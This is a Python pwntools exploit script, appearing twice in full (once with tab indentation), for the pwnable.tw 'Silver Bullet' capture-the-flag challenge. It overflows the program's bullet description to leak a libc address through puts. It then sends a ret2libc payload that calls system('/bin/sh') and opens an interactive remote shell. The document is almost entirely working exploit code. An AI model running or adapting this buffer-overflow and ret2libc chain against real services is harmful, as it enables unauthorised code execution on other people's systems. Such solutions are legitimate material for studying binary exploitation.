bin2415/attack_silver_bullet.py

## attack_silver_bullet.py
from pwn import *

silver_bullet = ELF('./silver_bullet')
libc = ELF('./libc_32.so.6')

#p = process('silver_bullet', env={'LD_PRELOAD' : './libc_32.so.6'})

p = remote('chall.pwnable.tw', 10103)
p.recvuntil('Your choice :')
p.sendline('1')
p.recvuntil('Give me your description of bullet :')
p.sendline('A'*47)

p.recvuntil('Your choice :')
p.sendline('2')
p.recvuntil('Give me your another description of bullet :')
p.sendline('1')
print('hello')

p.recvuntil('Your choice :')
p.sendline('2')
p.recvuntil('Give me your another description of bullet :')
payload1 = '\xff\xff\xff' + p32(0x12345678) + p32(silver_bullet.plt['puts']) + p32(silver_bullet.symbols['main']) + p32(silver_bullet.got['puts'])
p.sendline(payload1)

p.recvuntil('Your choice :')
p.sendline('3')
p.recvuntil('You win !!\n')
puts_addr = u32(p.recvline()[0:4])
print(hex(puts_addr))

libc_base_addr = puts_addr - libc.symbols['puts']

binsh = next(libc.search('/bin/sh\x00'))
binsh_addr = libc_base_addr + binsh
print('bin/sh string address is :' + hex(binsh_addr))
system = libc.symbols['system']
system_addr = libc_base_addr + system
exitm = libc.symbols['exit']
exit_addr = libc_base_addr + exitm


p.recvuntil('Your choice :')
p.sendline('1')
p.recvuntil('Give me your description of bullet :')
p.sendline('A'*47)

p.recvuntil('Your choice :')
p.sendline('2')
p.recvuntil('Give me your another description of bullet :')
p.sendline('1')
print('hello')

p.recvuntil('Your choice :')
p.sendline('2')
p.recvuntil('Give me your another description of bullet :')
payload1 = '\xff\xff\xff' + p32(0x12345678) + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)
p.sendline(payload1)

p.recvuntil('Your choice :')
p.sendline('3')


p.interactive()
	from pwn import *

	silver_bullet = ELF('./silver_bullet')
	libc = ELF('./libc_32.so.6')

	#p = process('silver_bullet', env={'LD_PRELOAD' : './libc_32.so.6'})

	p = remote('chall.pwnable.tw', 10103)
	p.recvuntil('Your choice :')
	p.sendline('1')
	p.recvuntil('Give me your description of bullet :')
	p.sendline('A'*47)

	p.recvuntil('Your choice :')
	p.sendline('2')
	p.recvuntil('Give me your another description of bullet :')
	p.sendline('1')
	print('hello')

	p.recvuntil('Your choice :')
	p.sendline('2')
	p.recvuntil('Give me your another description of bullet :')
	payload1 = '\xff\xff\xff' + p32(0x12345678) + p32(silver_bullet.plt['puts']) + p32(silver_bullet.symbols['main']) + p32(silver_bullet.got['puts'])
	p.sendline(payload1)

	p.recvuntil('Your choice :')
	p.sendline('3')
	p.recvuntil('You win !!\n')
	puts_addr = u32(p.recvline()[0:4])
	print(hex(puts_addr))

	libc_base_addr = puts_addr - libc.symbols['puts']

	binsh = next(libc.search('/bin/sh\x00'))
	binsh_addr = libc_base_addr + binsh
	print('bin/sh string address is :' + hex(binsh_addr))
	system = libc.symbols['system']
	system_addr = libc_base_addr + system
	exitm = libc.symbols['exit']
	exit_addr = libc_base_addr + exitm


	p.recvuntil('Your choice :')
	p.sendline('1')
	p.recvuntil('Give me your description of bullet :')
	p.sendline('A'*47)

	p.recvuntil('Your choice :')
	p.sendline('2')
	p.recvuntil('Give me your another description of bullet :')
	p.sendline('1')
	print('hello')

	p.recvuntil('Your choice :')
	p.sendline('2')
	p.recvuntil('Give me your another description of bullet :')
	payload1 = '\xff\xff\xff' + p32(0x12345678) + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)
	p.sendline(payload1)

	p.recvuntil('Your choice :')
	p.sendline('3')



	p.interactive()